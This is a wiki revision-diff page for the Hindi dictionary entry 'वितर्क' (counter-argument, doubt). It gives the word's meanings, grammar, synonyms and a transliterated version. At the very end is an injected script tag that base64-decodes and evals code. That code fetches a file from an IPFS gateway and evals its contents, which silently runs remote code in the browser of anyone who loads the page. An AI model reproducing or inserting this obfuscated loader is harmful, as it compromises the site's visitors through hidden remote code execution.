Difference between revisions of "वितर्क"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=किसी के तर्क से भिन्न या विपरीत तर्क, अनुमान, विचार, संदेह, शंका, कुतर्क करना, साहित्य में एक संचारी भाव जो उस समय माना जाता है जब मन में कोई विचार उत्पन्न होने पर मन ही मन उसके विरुद्ध तर्क किया जाता है और इस प्रकार असमंजस में रहा जाता है, एक प्रकार का अर्थालंकार जिसमें किसी प्रकार के सन्देह या वितर्क का उल्लेख होता है और कुछ निर्णय नहीं होता।।
+
|हिन्दी=किसी के तर्क से भिन्न या विपरीत तर्क, अनुमान, विचार, संदेह, शंका, कुतर्क करना, साहित्य में एक संचारी भाव जो उस समय माना जाता है जब मन में कोई विचार उत्पन्न होने पर मन ही मन उसके विरुद्ध तर्क किया जाता है और इस प्रकार असमंजस में रहा जाता है, एक प्रकार का अर्थालंकार जिसमें किसी प्रकार के सन्देह या '''वितर्क''' का उल्लेख होता है और कुछ निर्णय नहीं होता।
|व्याकरण=धातु, पुल्लिंग्।
+
|व्याकरण=धातु, पुल्लिंग
 
|उदाहरण=
 
|उदाहरण=
 
|विशेष=
 
|विशेष=
Line 10: Line 10:
 
|संबंधित शब्द=[[वितर्कण]]  
 
|संबंधित शब्द=[[वितर्कण]]  
 
}}
 
}}
 +
__INDEX__

Latest revision as of 10:24, 28 March 2011

shabd sandarbh
hindi kisi ke tark se bhinn ya viparit tark, anuman, vichar, sandeh, shanka, kutark karana, sahity mean ek sanchari bhav jo us samay mana jata hai jab man mean koee vichar utpann hone par man hi man usake viruddh tark kiya jata hai aur is prakar asamanjas mean raha jata hai, ek prakar ka arthalankar jisamean kisi prakar ke sandeh ya vitark ka ullekh hota hai aur kuchh nirnay nahian hota.
-vyakaran    dhatu, pulliang
-udaharan  
-vishesh   
-vilom   
-paryayavachi    apoh, tark, nivarak tark, shanka nivarak tark.
sanskrit vitarkh + achh
any granth
sanbandhit shabd vitarkan
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>